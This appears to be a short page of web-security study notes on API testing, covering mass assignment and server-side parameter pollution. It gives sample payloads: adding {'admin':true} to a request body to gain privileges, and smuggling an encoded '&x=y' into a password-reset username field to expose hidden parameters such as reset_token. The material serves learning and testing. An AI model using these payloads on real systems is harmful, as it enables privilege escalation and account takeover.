API Testing - TODO

API performing GET request and directly after a POST request and in the POST request notice additional JSON parameters in the body of response, indicate hidden parameter fields. Add hidden fields such as {"admin":true} can elevate access to higher privileged users or gain sensitive information about user.

API Reset Password Parameter Pollution

Notice the reset password API function uses parameter in POST body for username. To identify aditional hidden parameters for the API function insert random parameter &x=y to observe error message leaking information of positive result. URL encode the random parameter and add it to current POST body parameters username=administrator%26x=y.

Based on the response there is possible second parameter named field and reviewing the JavaScript source code there is reset_token parameter.

PreviousPrototype Pollution NextAccess Control

Last updated 9 months ago